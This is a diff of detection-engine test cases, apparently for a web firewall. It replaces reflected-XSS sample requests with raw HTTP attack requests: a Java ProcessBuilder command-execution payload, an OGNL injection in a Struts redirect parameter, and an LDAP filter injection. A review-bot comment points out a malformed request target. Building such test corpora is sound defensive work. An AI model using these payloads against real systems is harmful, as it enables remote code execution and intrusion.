+++ b/testcases/fd/1d/a479fb9451e9a1823d4a60822908.black @@ -1,10 +1,10 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /dataSetParam/verification;swagger-ui/ HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +{"sampleItem": "1", "validationRules": "function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} diff --git a/testcases/ff/67/62b331a3e94507a5759d1f9bcb8a.black b/testcases/ff/67/62b331a3e94507a5759d1f9bcb8a.black index fd6edfba5..2ea0d7322 100644 --- a/testcases/ff/67/62b331a3e94507a5759d1f9bcb8a.black +++ b/testcases/ff/67/62b331a3e94507a5759d1f9bcb8a.black 
@@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET index.action?redirect:${#a=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#b=#a.getRealPath("/"),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#b),#matt.getWriter().flush(),#matt.getWriter().close()} HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%27%5Cx65%5Cx76%5Cx61%5Cx6c%27%5D%28%27window%5B%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22%5D%28window%5B%22%5Cx61%5Cx74%5Cx6f%5Cx62%22%5D%28%22WFNT%22%29%29%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/ff/9b/d030430841b19bcc17c7bf60aea3.black b/testcases/ff/9b/d030430841b19bcc17c7bf60aea3.black index 5556afb99..2902972ab 100644 --- a/testcases/ff/9b/d030430841b19bcc17c7bf60aea3.black +++ b/testcases/ff/9b/d030430841b19bcc17c7bf60aea3.black 
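Review bot: The new request line in testcases/ff/67/62b331a3e94507a5759d1f9bcb8a.black begins `GET index.action?redirect:`, so the request target has no leading `/` and is not a valid origin-form target. A strict HTTP parser ahead of the detection engine may answer 400 before any rule runs, and the sample would then count as blocked for a reason unrelated to the expression in the query string. I would write `GET /index.action?redirect:…` with the remainder unchanged. If a malformed target is deliberately part of this test, the commit message should say so.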
@@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?paramd6f70e=admin%2A%29%28%28%7Cuserpassword=%2A%29 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27x%27%5D%3Dconstructor.getOwnPropertyDescriptor%3Bg%3D%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27x%27%5D%3B%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27y%27%5D%3Dg%28%27%27.sub%5B%5B%27__proto__%27%5D%5D%2C%27constructor%27%29%3B%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27z%27%5D%3Dconstructor.defineProperty%3Bd%3D%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27z%27%5D%3Bd%28%27%27.sub%5B%5B%27__proto__%27%5D%5D%2C%27constructor%27%2C%7Bvalue%3Afalse%7D%29%3B%7B%7D%5B%5B%27__proto__%27%5D%5D%5B%27y%27%5D.value%28%27alert%281%29%27%29%28%29 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close